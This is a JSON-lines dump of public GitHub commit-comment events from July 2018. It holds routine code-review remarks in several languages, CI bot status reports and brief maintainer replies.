{"id":"8028265441","type":"CommitCommentEvent","actor":{"login":"AlexeyKryuchkov"},"repo":{"name":"AlexeyKryuchkov/168686"},"payload":{"comment":{"id":29857747,"position":null,"line":null,"path":null,"commit_id":"8ac8800f272987fb8ec24cf000021d93bc0500e4","created_at":"2018-07-27T12:16:03Z","updated_at":"2018-07-27T12:16:03Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-27T12:16:03Z"}
{"id":"8028269154","type":"CommitCommentEvent","actor":{"login":"outflow"},"repo":{"name":"aanglastairbender/rmfframework-cm"},"payload":{"comment":{"id":29857754,"position":null,"line":null,"path":null,"commit_id":"3898f894e28bd5daf383ba9748ccae7d663fb922","created_at":"2018-07-27T12:16:56Z","updated_at":"2018-07-27T12:16:56Z","author_association":"NONE","body":"Sorry, I'll try be a better parameter. I'll be there next time!"}},"created_at":"2018-07-27T12:16:56Z"}
{"id":"8028276470","type":"CommitCommentEvent","actor":{"login":"alejandroarturom"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29857763,"position":null,"line":null,"path":null,"commit_id":"3cfabd54dd030f0050b7f2ebb9010a80dc403d94","created_at":"2018-07-27T12:18:43Z","updated_at":"2018-07-27T12:18:43Z","author_association":"COLLABORATOR","body":"What was the problem?"}},"created_at":"2018-07-27T12:18:43Z"}
{"id":"8028276768","type":"CommitCommentEvent","actor":{"login":"mayerm94"},"repo":{"name":"projecttacoma/cqm-execution-service"},"payload":{"comment":{"id":29857764,"position":6,"line":6,"path":"Dockerfile","commit_id":"261440e0015cdcaa101922cc306cac5efb5971e7","created_at":"2018-07-27T12:18:47Z","updated_at":"2018-07-27T12:18:47Z","author_association":"NONE","body":"This shouldn't be on github"}},"created_at":"2018-07-27T12:18:47Z"}
{"id":"8028278352","type":"CommitCommentEvent","actor":{"login":"Arias800"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29857767,"position":null,"line":null,"path":null,"commit_id":"09b29de0ead096e0c5a286e3dfc4d6e9efc0d4db","created_at":"2018-07-27T12:19:11Z","updated_at":"2018-07-27T12:19:11Z","author_association":"CONTRIBUTOR","body":"Je mets le paramètre en invisible ou pas ?"}},"created_at":"2018-07-27T12:19:11Z"}
{"id":"8028279927","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29857769,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-27T12:19:34Z","updated_at":"2018-07-27T12:19:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T12:19:34Z"}
{"id":"8028280126","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29857770,"position":18,"line":18,"path":"homework2/shopping.rb","commit_id":"85ec2f5d989a4ae6a5c3dd8a3b41acddbde41132","created_at":"2018-07-27T12:19:36Z","updated_at":"2018-07-27T12:19:36Z","author_association":"NONE","body":"ТЗ: Также вывести итоговую сумму за каждый товар."}},"created_at":"2018-07-27T12:19:36Z"}
{"id":"8028284758","type":"CommitCommentEvent","actor":{"login":"goodkov"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29857778,"position":null,"line":null,"path":null,"commit_id":"e7483f278452884a3fd6db391c8e6a13f3f93cad","created_at":"2018-07-27T12:20:44Z","updated_at":"2018-07-27T12:20:44Z","author_association":"NONE","body":"Do you open a pull request for this patch ?"}},"created_at":"2018-07-27T12:20:44Z"}
{"id":"8028284846","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29857779,"position":15,"line":15,"path":"homework2/shopping.rb","commit_id":"85ec2f5d989a4ae6a5c3dd8a3b41acddbde41132","created_at":"2018-07-27T12:20:45Z","updated_at":"2018-07-27T12:20:45Z","author_association":"NONE","body":"hash лучше переименовать во что-то менее общее. Например details."}},"created_at":"2018-07-27T12:20:45Z"}
{"id":"8028285318","type":"CommitCommentEvent","actor":{"login":"BAZENTEI"},"repo":{"name":"BAZENTEI/DirectX_Demo_0720"},"payload":{"comment":{"id":29857781,"position":null,"line":null,"path":null,"commit_id":"c32c4caa3bfa240391a0430088fef86369171da9","created_at":"2018-07-27T12:20:52Z","updated_at":"2018-07-27T12:20:52Z","author_association":"OWNER","body":"enemy、bulletの複数化 （次の玉が発射できます）\r\nplayerの回転、縮小の処理"}},"created_at":"2018-07-27T12:20:52Z"}
{"id":"8028286467","type":"CommitCommentEvent","actor":{"login":"skmedix"},"repo":{"name":"skmedix/SKlauncher"},"payload":{"comment":{"id":29857783,"position":null,"line":null,"path":null,"commit_id":"1e8487ede1dde4ce1d061254e99e8ee47a64ddf6","created_at":"2018-07-27T12:21:10Z","updated_at":"2018-07-27T12:21:10Z","author_association":"OWNER","body":"Next time don't instantly push en_US, just make a PR for that"}},"created_at":"2018-07-27T12:21:10Z"}
{"id":"8028286822","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29857784,"position":15,"line":15,"path":"homework2/shopping.rb","commit_id":"85ec2f5d989a4ae6a5c3dd8a3b41acddbde41132","created_at":"2018-07-27T12:21:15Z","updated_at":"2018-07-27T12:21:15Z","author_association":"NONE","body":"И можно использовать символы внутри для обращения по ключам"}},"created_at":"2018-07-27T12:21:15Z"}
{"id":"8028289071","type":"CommitCommentEvent","actor":{"login":"JanDC"},"repo":{"name":"JanDC/twig-wrapper"},"payload":{"comment":{"id":29857787,"position":null,"line":null,"path":null,"commit_id":"7d0989f3338f5c89877b6eb7a71a47bd736e1375","created_at":"2018-07-27T12:21:48Z","updated_at":"2018-07-27T12:21:48Z","author_association":"OWNER","body":"Exactly!\r\nThe goal of extending twig was to provide a class that behaves exactly as the twig environment that it wraps would (except for the render function). And to provide for instance type hinting.\r\n\r\nThe `__call` method has to be triggered to delegate those functions, but as you correctly pointed out it cannot when the twig environment is extended.\r\n\r\nAn apparent solution would be to leave out the injection of the wrapped environment and use it as a separate, independent twig environment which would eliminate the need of `__call.` But one would have to register all templates and extensions back to this environment, which I don't want to force onto users.\r\n\r\nI'll confer with my colleague's to provide a workable solution, for now I'll just remove the extending part."}},"created_at":"2018-07-27T12:21:48Z"}
{"id":"8028291895","type":"CommitCommentEvent","actor":{"login":"hossenlopp"},"repo":{"name":"projecttacoma/cqm-execution-service"},"payload":{"comment":{"id":29857791,"position":6,"line":6,"path":"Dockerfile","commit_id":"261440e0015cdcaa101922cc306cac5efb5971e7","created_at":"2018-07-27T12:22:31Z","updated_at":"2018-07-27T12:22:31Z","author_association":"NONE","body":"Can the Dockerfile include other files? Perhaps we can have a local file on our machines with this that the Dockerfile includes if it exists."}},"created_at":"2018-07-27T12:22:31Z"}
{"id":"8028293284","type":"CommitCommentEvent","actor":{"login":"mayerm94"},"repo":{"name":"projecttacoma/cqm-execution-service"},"payload":{"comment":{"id":29857793,"position":6,"line":6,"path":"Dockerfile","commit_id":"261440e0015cdcaa101922cc306cac5efb5971e7","created_at":"2018-07-27T12:22:52Z","updated_at":"2018-07-27T12:22:52Z","author_association":"NONE","body":"I think this would be good as a script inside our internal server-scripts repo"}},"created_at":"2018-07-27T12:22:52Z"}
{"id":"8028322841","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29857857,"position":null,"line":null,"path":null,"commit_id":"c02358c32ba48c3382f8e133056944ed71393b2a","created_at":"2018-07-27T12:29:49Z","updated_at":"2018-07-27T12:29:49Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/11/display/redirect) (on internal Jenkins) failed in stage 'Run device tests' 🔥 : hudson.AbortException: script returned exit code 255\n\n🔥 [Failed to publish results](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/11//console) 🔥\n🔥 [Failed to publish results](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/11//console) 🔥\n🔥 [Test run failed]() 🔥\n"}},"created_at":"2018-07-27T12:29:49Z"}
{"id":"8028323344","type":"CommitCommentEvent","actor":{"login":"MaksymPavlov"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29857858,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-27T12:29:56Z","updated_at":"2018-07-27T12:29:56Z","author_association":"NONE","body":"good job!!!"}},"created_at":"2018-07-27T12:29:56Z"}
{"id":"8028324789","type":"CommitCommentEvent","actor":{"login":"dmed256"},"repo":{"name":"libocca/occa"},"payload":{"comment":{"id":29857862,"position":4,"line":31,"path":"tests/src/lang/tokenizer/utils.hpp","commit_id":"1161e0a927d0e0b9a108c9da49913a126bdc3289","created_at":"2018-07-27T12:30:16Z","updated_at":"2018-07-27T12:30:16Z","author_association":"MEMBER","body":"Ideally I should but those 2 changes are relatively minor:\r\n- Committed an extra file\r\n- Forgot `using namespace` on the test util header"}},"created_at":"2018-07-27T12:30:16Z"}
{"id":"8028328349","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29857867,"position":4,"line":10,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:31:05Z","updated_at":"2018-07-27T12:31:05Z","author_association":"NONE","body":"варианты решения:\r\n- переместить сеттеры этих переменных в `private`, чтобы ими можно было пользоваться исключительно внутри класса\r\n- убрать сеттеры вообще и внутри методов бращаться к переменным напрямую \r\n\r\n(если вообще такие обращения где-то нужны)"}},"created_at":"2018-07-27T12:31:05Z"}
{"id":"8028330228","type":"CommitCommentEvent","actor":{"login":"jamesthurman64"},"repo":{"name":"jamesthurman64/messages"},"payload":{"comment":{"id":29857869,"position":1,"line":1,"path":"README.md","commit_id":"1aafc3378e9af0b5ccf0b9f2f07dbe1c35513ab9","created_at":"2018-07-27T12:31:30Z","updated_at":"2018-07-27T12:31:30Z","author_association":"OWNER","body":"Messages"}},"created_at":"2018-07-27T12:31:30Z"}
{"id":"8028332525","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29857876,"position":1,"line":7,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:32:01Z","updated_at":"2018-07-27T12:32:01Z","author_association":"NONE","body":"лучше называть файлы так же, как классы в них содержащиеся\r\nдля класса `Route` - файл `route.rb`"}},"created_at":"2018-07-27T12:32:01Z"}
{"id":"8028334890","type":"CommitCommentEvent","actor":{"login":"pierre-emmanuelJ"},"repo":{"name":"exoscale/egoscale"},"payload":{"comment":{"id":29857885,"position":null,"line":null,"path":null,"commit_id":"ae4a2f0dcaf62c008816e505c3d9b1706d0f62a1","created_at":"2018-07-27T12:32:34Z","updated_at":"2018-07-27T12:32:34Z","author_association":"MEMBER","body":"thx"}},"created_at":"2018-07-27T12:32:34Z"}
{"id":"8028337621","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29857889,"position":null,"line":null,"path":null,"commit_id":"70b7d899f362d29d4337225596139b7aea03fdfe","created_at":"2018-07-27T12:33:13Z","updated_at":"2018-07-27T12:33:13Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a>  \n"}},"created_at":"2018-07-27T12:33:13Z"}
{"id":"8028342689","type":"CommitCommentEvent","actor":{"login":"ofir5353"},"repo":{"name":"ofir5353/training"},"payload":{"comment":{"id":29857897,"position":null,"line":null,"path":null,"commit_id":"774776f7becfab10e97bddd344348b5ee2d13550","created_at":"2018-07-27T12:34:25Z","updated_at":"2018-07-27T12:34:25Z","author_association":"OWNER","body":"great commit bro"}},"created_at":"2018-07-27T12:34:25Z"}
{"id":"8028343484","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29857899,"position":9,"line":18,"path":"ruby_basics_part_1/quadratic_equation.rb","commit_id":"281a9f142f10c856bd2c21355f86d05e619e9b95","created_at":"2018-07-27T12:34:36Z","updated_at":"2018-07-27T12:34:36Z","author_association":"NONE","body":"Так а где этот метод используется? Должен вызываться в 42 строке. Где дискриминант больше 0. И нужно изменить методы negative/positive_root, что-б они принимали результат вычисления этого метода третьим аргументом вместо дискриминанта. То есть получится что-то такое\r\n```\r\nelsif descrmnt > 0\r\n  square = square_root(descrmnt)\r\n  x1 = positive_root(a, b, square)\r\n  x2 = negative_root(a, b, square)\r\n  puts ...\r\nend\r\n```\r\nИ соответственно поменять тело методов"}},"created_at":"2018-07-27T12:34:36Z"}
{"id":"8028344143","type":"CommitCommentEvent","actor":{"login":"ofir5353"},"repo":{"name":"ofir5353/training"},"payload":{"comment":{"id":29857900,"position":null,"line":null,"path":null,"commit_id":"774776f7becfab10e97bddd344348b5ee2d13550","created_at":"2018-07-27T12:34:46Z","updated_at":"2018-07-27T12:34:46Z","author_association":"OWNER","body":"I think you should also add note 2 and note 4, cuz where are they??\r\n"}},"created_at":"2018-07-27T12:34:46Z"}
{"id":"8028347680","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29857909,"position":7,"line":13,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:35:36Z","updated_at":"2018-07-27T12:35:36Z","author_association":"NONE","body":"маршрут должен состоять из станций, т.е. из объектов класса Станция\r\nсудя по дефолтным значениям метода \"инишиалайз\" текущая версия маршрута подразумевается состоящей из объектов класса `String` (видимо из названий станций) - это неверно\r\nв скринкасте и в дополнительном посте, который я скидывал в личку подробно разобрано манипулирование имено объектами других классов\r\nрекомендую еще раз обратиться к этим источникам"}},"created_at":"2018-07-27T12:35:36Z"}
{"id":"8028347736","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29857911,"position":9,"line":18,"path":"ruby_basics_part_1/quadratic_equation.rb","commit_id":"281a9f142f10c856bd2c21355f86d05e619e9b95","created_at":"2018-07-27T12:35:37Z","updated_at":"2018-07-27T12:35:37Z","author_association":"NONE","body":"да и метод square_root принимает дискриминант аргументом. Так-что лучше использовать слово discrmnt вместо value в параметрах"}},"created_at":"2018-07-27T12:35:37Z"}
{"id":"8028349015","type":"CommitCommentEvent","actor":{"login":"Archemagus"},"repo":{"name":"tgstation/tgstation"},"payload":{"comment":{"id":29857913,"position":null,"line":null,"path":null,"commit_id":"59fa61113f45688ad976334a3e4409487789519b","created_at":"2018-07-27T12:35:56Z","updated_at":"2018-07-27T12:35:56Z","author_association":"NONE","body":"Well, can u make silo synched at round start?\r\n![story_nokia_7-600x315](https://user-images.githubusercontent.com/32466328/43320835-963a1a14-91b2-11e8-85eb-8fb77f7033f5.jpg)\r\n"}},"created_at":"2018-07-27T12:35:56Z"}
{"id":"8028350286","type":"CommitCommentEvent","actor":{"login":"ivmai"},"repo":{"name":"Unity-Technologies/bdwgc"},"payload":{"comment":{"id":29857914,"position":null,"line":null,"path":null,"commit_id":"2ca67995b018495bfdede9f943239b8c703680bd","created_at":"2018-07-27T12:36:14Z","updated_at":"2018-07-27T12:36:14Z","author_association":"NONE","body":"Alternatively, you could pass \"CFLAGS_EXTRA=-D MANUAL_VDB\" to make."}},"created_at":"2018-07-27T12:36:14Z"}
{"id":"8028352269","type":"CommitCommentEvent","actor":{"login":"Mr-Rm"},"repo":{"name":"EvilBeaver/OneScript"},"payload":{"comment":{"id":29857916,"position":104,"line":103,"path":"src/ScriptEngine/Machine/TypeFactory.cs","commit_id":"f9a113adc9488fcca10813123b24ad4b21ddfb83","created_at":"2018-07-27T12:36:42Z","updated_at":"2018-07-27T12:36:42Z","author_association":"CONTRIBUTOR","body":"Аналогичный код `.Any(y =>...` есть еще в нескольких местах.\r\nТакже в ряде мест можно заменить использование `GetCustomAttributes(...)` на `GetCustomAttribute(...)`, если точно известно, что атрибут может быть только один.\r\nОбщий прирост скорости - почти 2%."}},"created_at":"2018-07-27T12:36:42Z"}
{"id":"8028353316","type":"CommitCommentEvent","actor":{"login":"loduque"},"repo":{"name":"loduque/ph-submissions"},"payload":{"comment":{"id":29857918,"position":null,"line":null,"path":null,"commit_id":"ac3c0ad2345725782ced6d48cb8d8b9b9beabb3b","created_at":"2018-07-27T12:36:57Z","updated_at":"2018-07-27T12:36:57Z","author_association":"OWNER","body":"Hola! No me sale esa opción y me dice que \"You’re editing a file in a project you don’t have write access to. Submitting a change to this file will write it to a new branch in your fork loduque/ph-submissions, so you can send a pull request.\"  Me imagino que hay que tendrías que \"Merge\" mi fork aceptando la \"Request\" que hizo cuando hice cambios en el archivo.\r\n"}},"created_at":"2018-07-27T12:36:57Z"}
{"id":"8028353904","type":"CommitCommentEvent","actor":{"login":"romkatv"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29857921,"position":108,"line":108,"path":"event_loop.cc","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-27T12:37:05Z","updated_at":"2018-07-27T12:37:05Z","author_association":"OWNER","body":"Ain't worth it. Connections rarely expire. And when they do, an extra `Clock::now()` call is unlikely to affect any traffic (`epoll_wait` almost always produces just one event)."}},"created_at":"2018-07-27T12:37:05Z"}
{"id":"8028356235","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29857928,"position":7,"line":13,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:37:36Z","updated_at":"2018-07-27T12:37:36Z","author_association":"NONE","body":"дефолтные значения для маршрута не имеют смысла\r\nзачем нам в системе маршрут со станциями \"Неизвестно\" и \"Неизвестно\" ?\r\nчто с ним делать?\r\nдефолты нужно убирать, маршрут должен состоять из реальных объектов класса Станция"}},"created_at":"2018-07-27T12:37:36Z"}
{"id":"8028365286","type":"CommitCommentEvent","actor":{"login":"alexnelson9980"},"repo":{"name":"alexnelson9980/hello-world"},"payload":{"comment":{"id":29857935,"position":null,"line":null,"path":null,"commit_id":"8d61e84b218bb1e0ba8168036e1243d756f40caa","created_at":"2018-07-27T12:39:42Z","updated_at":"2018-07-27T12:39:42Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-27T12:39:42Z"}
{"id":"8028368640","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29857944,"position":13,"line":18,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T12:40:27Z","updated_at":"2018-07-27T12:40:27Z","author_association":"NONE","body":"по сути метод `initialize` это и есть `make_route`\r\nдругое название этого метода - конструктор\r\nименно в нем должна происходить \"сборка\" объекта, инициализация его аттрибутов\r\n"}},"created_at":"2018-07-27T12:40:27Z"}
{"id":"8028369884","type":"CommitCommentEvent","actor":{"login":"adireddy501"},"repo":{"name":"adireddy501/dev"},"payload":{"comment":{"id":29857949,"position":3,"line":1,"path":"ADi1.txt","commit_id":"6253ef330a38cd99510148fb09f06096ab9b6d44","created_at":"2018-07-27T12:40:43Z","updated_at":"2018-07-27T12:40:43Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-27T12:40:43Z"}
{"id":"8028370555","type":"CommitCommentEvent","actor":{"login":"adireddy501"},"repo":{"name":"adireddy501/dev"},"payload":{"comment":{"id":29857950,"position":null,"line":null,"path":null,"commit_id":"6253ef330a38cd99510148fb09f06096ab9b6d44","created_at":"2018-07-27T12:40:52Z","updated_at":"2018-07-27T12:40:52Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-27T12:40:52Z"}
{"id":"8028370659","type":"CommitCommentEvent","actor":{"login":"Safero"},"repo":{"name":"disam8853/imot2"},"payload":{"comment":{"id":29857951,"position":null,"line":null,"path":null,"commit_id":"19730c960edb1ad30ad34546b208467fe0b55068","created_at":"2018-07-27T12:40:53Z","updated_at":"2018-07-27T12:40:53Z","author_association":"COLLABORATOR","body":"Simply inserted the logo"}},"created_at":"2018-07-27T12:40:53Z"}
{"id":"8028370810","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/arduino-sdp"},"payload":{"comment":{"id":29857953,"position":19,"line":19,"path":"i2chelper.cpp","commit_id":"6363337852e6497e26cb1fbdab1abc5ceb5af12e","created_at":"2018-07-27T12:40:55Z","updated_at":"2018-07-27T12:40:55Z","author_association":"NONE","body":"<COPYRIGHT HOLDER> -> Sensirion AG"}},"created_at":"2018-07-27T12:40:55Z"}
{"id":"8028371125","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-polyclip-feedstock"},"payload":{"comment":{"id":29857954,"position":null,"line":null,"path":null,"commit_id":"15948b8e9bf9d28d31f970c953d0a62df04d8db0","created_at":"2018-07-27T12:40:59Z","updated_at":"2018-07-27T12:40:59Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jsignell was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-27T12:40:59Z"}
{"id":"8028371517","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29857955,"position":41,"line":46,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"0a40354e4e08273ee1885cf183e8209b61599b64","created_at":"2018-07-27T12:41:06Z","updated_at":"2018-07-27T12:41:06Z","author_association":"NONE","body":"Проверку на равносторонность нужно вытащить в отдельный if выше, и прекратить выполнение программы, если треугольник равносторонний. Он точно не будет прямоугольным и не прийдется лишний раз делать вычисления прямоугольности."}},"created_at":"2018-07-27T12:41:06Z"}
{"id":"8028378690","type":"CommitCommentEvent","actor":{"login":"xyxSUN"},"repo":{"name":"xyxSUN/demo"},"payload":{"comment":{"id":29857979,"position":null,"line":null,"path":null,"commit_id":"eb8edb8c3e0927080536a661f8a33bb2c964afda","created_at":"2018-07-27T12:42:41Z","updated_at":"2018-07-27T12:42:41Z","author_association":"OWNER","body":"very good"}},"created_at":"2018-07-27T12:42:41Z"}
{"id":"8028382591","type":"CommitCommentEvent","actor":{"login":"xx979xx"},"repo":{"name":"nullku7/openpilot"},"payload":{"comment":{"id":29857985,"position":null,"line":null,"path":null,"commit_id":"c2bb8d7b2ccff44f68df6831ec62ec44184012fb","created_at":"2018-07-27T12:43:32Z","updated_at":"2018-07-27T12:43:32Z","author_association":"NONE","body":"Add Genesis Checksum Support"}},"created_at":"2018-07-27T12:43:32Z"}
{"id":"8028383368","type":"CommitCommentEvent","actor":{"login":"lorc"},"repo":{"name":"andr2000/xen"},"payload":{"comment":{"id":29857987,"position":459,"line":459,"path":"xen/include/public/io/cameraif.h","commit_id":"0ad6d820f3f64fb249bf3634011239da86dd5a63","created_at":"2018-07-27T12:43:42Z","updated_at":"2018-07-27T12:43:42Z","author_association":"NONE","body":"\"Pass al zeros in config fields\". You don't want zeros in `operation` field"}},"created_at":"2018-07-27T12:43:42Z"}
{"id":"8028383806","type":"CommitCommentEvent","actor":{"login":"sli921"},"repo":{"name":"jenkinsci/publish-over-ssh-plugin"},"payload":{"comment":{"id":29857990,"position":null,"line":null,"path":null,"commit_id":"81e80e924bf447dd785af75d2127b7ff207629e8","created_at":"2018-07-27T12:43:48Z","updated_at":"2018-07-27T12:43:48Z","author_association":"NONE","body":"Where can I find the code for Declarative Syntax? Or is only the Pipeline Syntax supported?"}},"created_at":"2018-07-27T12:43:48Z"}
{"id":"8028384998","type":"CommitCommentEvent","actor":{"login":"peterdemin"},"repo":{"name":"applegrew/django-select2"},"payload":{"comment":{"id":29857994,"position":24,"line":77,"path":"django_select2/conf.py","commit_id":"1954bf57fafee0f27a7b444b1a468331ac2af9b3","created_at":"2018-07-27T12:44:04Z","updated_at":"2018-07-27T12:44:04Z","author_association":"NONE","body":"I totally understand lack of time. But dropping supported (for almost a year more) python version is a big step and should go in major release, instead of patch. 3.4 is the default in CentOS 7, which my company uses.\r\nIf you're concerned with semantic versioning, I would suggest releasing 4.0.0 with the package as it is now. And 3.8.2 with py34 support "}},"created_at":"2018-07-27T12:44:04Z"}
{"id":"8028385536","type":"CommitCommentEvent","actor":{"login":"defi75"},"repo":{"name":"abisoft11/slappy-translations"},"payload":{"comment":{"id":29857996,"position":4,"line":11,"path":"de/app/de.json","commit_id":"1985658b8a6d82fe86ef6aea347bc004cc299d47","created_at":"2018-07-27T12:44:10Z","updated_at":"2018-07-27T12:44:10Z","author_association":"COLLABORATOR","body":"\"Entfernen\""}},"created_at":"2018-07-27T12:44:10Z"}
{"id":"8028386804","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29857997,"position":45,"line":50,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"0a40354e4e08273ee1885cf183e8209b61599b64","created_at":"2018-07-27T12:44:27Z","updated_at":"2018-07-27T12:44:27Z","author_association":"NONE","body":"Сейчас если треугольник у нас проямоугольный и равнобедренный у нас выведется\r\n```\r\nThis triangle is right angled\r\nThis triangle is isosceles triangle\r\n```\r\nА нам бы хотелось видеть только одно из этих 2 сообщений. Условие нужно будет написать используя elsif. А не 2 отдельных if стэйтмэнта. Причем важно поставить их в правильном порядке, потому-что если первым будет идти проверка только на прямоугольность - отработает эта ветвь и проверка на равнобедренность - никогда не отработает."}},"created_at":"2018-07-27T12:44:27Z"}
{"id":"8028389263","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29858005,"position":null,"line":null,"path":null,"commit_id":"d2ae65c6829c246480685615896c265a91b88075","created_at":"2018-07-27T12:45:00Z","updated_at":"2018-07-27T12:45:00Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/118\r\nhttps://github.com/canmet-energy/btap_tasks/issues/115"}},"created_at":"2018-07-27T12:45:00Z"}
{"id":"8028391607","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29858010,"position":null,"line":null,"path":null,"commit_id":"05ac6cc4e8f9eb3ea605c6f546d30de43d3ee6e2","created_at":"2018-07-27T12:45:30Z","updated_at":"2018-07-27T12:45:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Validate Leland94 with Excel](https://trello.com/c/YfZ6KL4Q/59-validate-leland94-with-excel)"}},"created_at":"2018-07-27T12:45:30Z"}
{"id":"8028392238","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29858011,"position":null,"line":null,"path":null,"commit_id":"05ac6cc4e8f9eb3ea605c6f546d30de43d3ee6e2","created_at":"2018-07-27T12:45:39Z","updated_at":"2018-07-27T12:45:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Leland 94 - Test Skript in Python with Examples from Excel](https://trello.com/c/cgAMbokq/69-leland-94-test-skript-in-python-with-examples-from-excel)"}},"created_at":"2018-07-27T12:45:39Z"}
